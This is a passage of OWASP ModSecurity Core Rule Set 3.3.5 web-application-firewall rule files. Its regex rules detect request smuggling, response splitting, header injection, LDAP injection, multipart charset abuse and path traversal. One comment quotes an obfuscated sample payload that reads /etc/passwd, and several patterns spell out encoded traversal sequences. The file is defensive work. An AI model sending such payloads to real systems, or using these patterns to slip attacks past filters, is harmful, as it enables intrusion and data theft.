msg:'Invalid character in request (outside of very strict set)',\ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # This is a stricter sibling of 920270. # SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ "id:920274,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request headers (outside of very strict set)',\ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # This is a stricter sibling of 920270. # The 'Sec-Fetch-User' header may contain the '?' (63) character. # Therefore we exclude this header from rule 920274 which forbids '?'. # https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user # SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63,65-90,95,97-122" \ "id:920275,\ phase:2,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request headers (outside of very strict set)',\ logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # -=[ Abnormal Character Escapes ]=- # # [ Rule Logic ] # Consider the following payload: arg=cat+/e\tc/pa\ssw\d # Here, \s and \d were only used to obfuscate the string passwd and a lot of # parsers will silently ignore the non-necessary escapes. The case with \t is # a bit different though, as \t is a natural escape for the TAB character, # so we will avoid this (and \n, \r, etc.). # # This rule aims to detect non-necessary, abnormal escapes. You could say it is # a nice way to forbid the backslash character where it is not needed. # # This is a new rule at paranoia level 4. We expect quite a few false positives # for this rule and we will later evaluate if the rule makes any sense at all. # The rule is redundant with 920273 and 920274 in PL4. But if the rule proofs # to be useful and false positives remain at a reasonable level, then it might # be shifted to PL3 in a future release, where it would be the only rule # covering the backslash escape. # # We forbid backslashes followed by a list of basic ascii characters - unless # the backslash is preceded by another backslash. # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdeghijklmpqwxyz123456789]" \ "id:920460,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ log,\ msg:'Abnormal character escapes in request',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/153/267',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" modsecurity-crs-3.3.5/rules/REQUEST-921-PROTOCOL-ATTACK.conf000066400000000000000000000406501446122515100225320ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ HTTP Request Smuggling ]=- # # [ Rule Logic ] # This rule looks for a HTTP / WEBDAV method name in combination with the word http/\d or a CR/LF character. # This would point to an attempt to inject a 2nd request into the request, thus bypassing # tests carried out on the primary request. # # [ References ] # http://projects.webappsec.org/HTTP-Request-Smuggling # SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+(?:\/|\w)[^\s]*(?:\s+http\/\d|[\r\n])" \ "id:921110,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ msg:'HTTP Request Smuggling Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ HTTP Response Splitting ]=- # # [ Rule Logic ] # These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters. # These characters may cause problems if the data is returned in a respones header and # may be interpreted by an intermediary proxy server and treated as two separate # responses. # # [ References ] # http://projects.webappsec.org/HTTP-Response-Splitting # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n]\W*?(?:content-(?:type|length)|set-cookie|location):\s*\w" \ "id:921120,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:lowercase,\ msg:'HTTP Response Splitting Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \ "id:921130,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ msg:'HTTP Response Splitting Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ HTTP Header Injection ]=- # # [ Rule Logic ] # These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters, # on their own or in combination with header field names. # These characters may cause problems if the data is returned in a response header # and interpreted by the client. # The rules are similar to rules defending against the HTTP Request Splitting and # Request Smuggling rules. # # [ References ] # https://en.wikipedia.org/wiki/HTTP_header_injection # SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ "id:921140,\ phase:2,\ block,\ capture,\ t:none,t:htmlEntityDecode,\ msg:'HTTP Header Injection Attack via headers',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/273',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Detect newlines in argument names. # Checking for GET arguments has been moved to paranoia level 2 (921151) # in order to mitigate possible false positives. # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # SecRule ARGS_NAMES "@rx [\n\r]" \ "id:921150,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:htmlEntityDecode,\ msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\s*:" \ "id:921160,\ phase:1,\ block,\ capture,\ t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # -=[ HTTP Splitting ]=- # # This rule detect \n or \r in the REQUEST FILENAME # Reference: https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) # SecRule REQUEST_FILENAME "@rx [\n\r]" \ "id:921190,\ phase:1,\ block,\ t:none,t:urlDecodeUni,\ msg:'HTTP Splitting (CR/LF in request filename detected)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ LDAP Injection ]=- # # [ Rule Logic ] # # This is a rule trying to prevent LDAP injection. It is based on a BlackHat presentation by Alonso Parada # and regex writing by Denis Kolegov. # # [ References ] # * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf # * https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ # * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!\<\>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!\<\>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!\<\>\~]+[><~]?=[^:\(\)\&\|\!\<\>\~]*)" \ "id:921200,\ phase:2,\ block,\ capture,\ t:none,t:htmlEntityDecode,\ msg:'LDAP Injection Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-ldap',\ tag:'platform-multi',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/136',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ Body Processor Bypass ]=- # # [ Rule Logic ] # # This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. # This prevents bypasses targeting the Modsecurity recommended rules controlling which body processor is used. # # Regular expression generated from util/regexp-assemble/data/921421.data. # To update the regular expression run the following shell script # (consult util/regexp-assemble/README.md for details): # util/regexp-assemble/regexp-assemble.py update 921421 # SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s,]+[;\s,].*?(?:(?:application(?:\/soap\+|\/)|text\/)xml|application\/(?:.+[+])?json)" \ "id:921421,\ phase:1,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # # Detect newlines in GET argument values. # These may point to a HTTP header injection attack, but can also sometimes # occur in benign query parameters. # # See also: rule 921140, 921150 # SecRule ARGS_GET "@rx [\n\r]" \ "id:921151,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:htmlEntityDecode,\ msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # -=[ Body Processor Bypass ]=- # # [ Rule Logic ] # # This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. # # [ References ] # * See rule 921422 # # Regular expression generated from util/regexp-assemble/data/921422.data. # To update the regular expression run the following shell script # (consult util/regexp-assemble/README.md for details): # util/regexp-assemble/regexp-assemble.py update 921422 # SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s,]+[;\s,].*?\b(?:(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)|(text|multipart|application)|(\/|\+))\b" \ "id:921422,\ phase:1,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # # # Forbid Request Range Header # # It is possible abuse the HTTP Request Range Header to leak error pages # and other information in very small snippets. # The easiest way to fight this is to deny the use of this header. # This is a viable option since the header is only used in rare circumstances # anymore. # If it is necessary to use it in a certain setup, then it is best to # create a rule exclusion for a given URI and this rule ID as a workaround. # SecRule &REQUEST_HEADERS:Range "@gt 0" \ "id:921230,\ phase:1,\ block,\ t:none,\ msg:'HTTP Range Header detected',\ logdata:'Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # -=[ HTTP Parameter Pollution ]=- # # [ Rule Logic ] # These rules look for multiple parameters with the same name. # 921170 counts the occurrences of the individual parameters. # 921180 checks if any counter is > 1. # # One HPP attack vector is to try evade signature filters by distributing the # attack payload across multiple parameters with the same name. # This works as many security devices only apply signatures to individual # parameter payloads, however the back-end web application may (in the case # of ASP.NET) consolidate all of the payloads into one thus making the # attack payload active. # # [ References ] # http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html # https://capec.mitre.org/data/definitions/460.html # SecRule ARGS_NAMES "@rx ." \ "id:921170,\ phase:2,\ pass,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/137/15/460',\ ver:'OWASP_CRS/3.3.5',\ setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'" SecRule TX:/paramcounter_.*/ "@gt 1" \ "id:921180,\ phase:2,\ pass,\ msg:'HTTP Parameter Pollution (%{TX.1})',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/137/15/460',\ tag:'paranoia-level/3',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \ "capture,\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-921-PROTOCOL-ATTACK" modsecurity-crs-3.3.5/rules/REQUEST-922-MULTIPART-ATTACK.conf000066400000000000000000000106021446122515100226450ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # # This file is to address the 3UWMWA6W vulnerability. # It requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports # of the security fixes in these versions) or a compatible engine supporting these changes. # # If you cannot upgrade ModSecurity, this file will cause ModSecurity to fail to start. # In that case, you can temporarily delete this file. However, you will be missing # protection from these rules. Therefore, we recommend upgrading your engine instead. # The rules in this file will be part of the 920 / 921 in the future. # Only allow specific charsets when using "_charset_" # Note: this is in phase:2 because these are headers that come in the body SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \ "id:922100,\ phase:2,\ block,\ t:none,\ msg:'Multipart content type global _charset_ definition is not allowed by policy',\ logdata:'Matched Data: %{ARGS._charset_}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-multipart-header',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'paranoia-level/1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule ARGS:_charset_ "!@within |%{tx.allowed_request_content_type_charset}|" \ "t:lowercase,\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Only allow specific charsets same as Rule 920600 # Note: this is in phase:2 because these are headers that come in the body SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*+:\s*+(.*)$" \ "id:922110,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Illegal MIME Multipart Header content-type: charset parameter',\ logdata:'Matched Data: %{TX.1} found within Content-Type multipart form',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ tag:'OWASP_CRS',\ tag:'capec/272/220',\ tag:'paranoia-level/1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule TX:1 "!@rx ^(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*(?:\s*+,\s*+(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*)*$" \ "t:lowercase,\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used (see: https://www.rfc-editor.org/rfc/rfc7578#section-4.7) # Note: this is in phase:2 because these are headers that come in the body SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \ "id:922120,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used',\ logdata:'Matched Data: %{TX.0}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-deprecated-header',\ tag:'OWASP_CRS',\ tag:'capec/272/220',\ tag:'paranoia-level/1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" modsecurity-crs-3.3.5/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf000066400000000000000000000136141446122515100234440ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Directory Traversal Attacks ]=- # # Ref: https://github.com/wireghoul/dotdotpwn # # [ Encoded /../ Payloads ] # SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" \ "id:930100,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Path Traversal Attack (/../)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-lfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" # # [ Decoded /../ Payloads ] # SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?:^|[\\/])\.\.(?:[\\/]|$)" \ "id:930110,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ msg:'Path Traversal Attack (/../)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-lfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" # # -=[ OS File Access ]=- # # Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile lfi-os-files.data" \ "id:930120,\ phase:2,\ 